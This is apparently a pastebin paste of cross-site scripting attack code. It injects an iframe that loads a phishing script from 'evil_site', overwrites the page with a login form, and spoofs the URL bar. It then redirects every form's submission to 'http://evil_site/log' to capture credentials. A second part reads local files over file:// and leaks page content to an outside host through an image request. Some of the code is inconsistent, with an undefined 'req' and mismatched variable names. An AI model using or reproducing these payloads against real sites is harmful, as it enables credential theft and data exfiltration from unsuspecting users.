SHOW:
|
|
- or go back to the newest paste.
| 1 | @Abdelmoughite Eljoaydi | |
| 2 | ||
| 3 | /** | |
| 4 | <iframe src="http://evil_site/phishing.js"></iframe> | |
| 5 | *This payload injects an iframe tag that will load the script located at "/phishing.jsβ. | |
| 6 | *Letβs take a look at what phishing.js could contain: | |
| 7 | */ | |
| 8 | ||
| 9 | // Function to override the HTML content. | |
| 10 | function override(url) {
| |
| 11 | var xhr_req = new XMLHttpRequest(); | |
| 12 | xhr_req.open('GET', url, false);
| |
| 13 | xhr_req.onreadystatechange = function () {
| |
| 14 | if (xhr_req.readyState == 4 && xhr_req.responseText != "") {
| |
| 15 | document.innerHTML = xhr_req.responseText; | |
| 16 | } | |
| 17 | } | |
| 18 | xhr_req.send(null); | |
| 19 | } | |
| 20 | ||
| 21 | //Call override(url) function to override the current page with the content of "LoginForm.jsp". | |
| 22 | override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.
| |
| 23 | ||
| 24 | //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp). | |
| 25 | var stateObj = { log: "login" };
| |
| 26 | history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp");
| |
| 27 | ||
| 28 | //Hooking forms and submit victim credentials to "http://evil_site/log". | |
| 29 | var forms = document.getElementsByTagName("form");
| |
| 30 | for (index = 0; index < forms.length; index++) {
| |
| 31 | void(forms[index].action = "http://evil_site/log"); | |
| 32 | } | |
| 33 | ============================================================================================================================== | |
| 34 | //Reading local files. (works only on Firefox) | |
| 35 | ||
| 36 | function _LFileAccess(_method,action,argv){
| |
| 37 | ||
| 38 | req.open(_method,action,false); | |
| 39 | if(_method=="POST") | |
| 40 | req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
| |
| 41 | req.send(argv); | |
| 42 | return req.responseText; | |
| 43 | } | |
| 44 | var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null);
| |
| 45 | dump(local_file); | |
| 46 | ||
| 47 | //Screen-capture of the current page state. | |
| 48 | XMlHttpReq.open("GET","example.com",false);
| |
| 49 | function getURL(s) {
| |
| 50 | var image = new Image(); | |
| 51 | image.style.width = 0; | |
| 52 | image.style.height = 0; | |
| 53 | image.src = s; | |
| 54 | } | |
| 55 | getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText); |
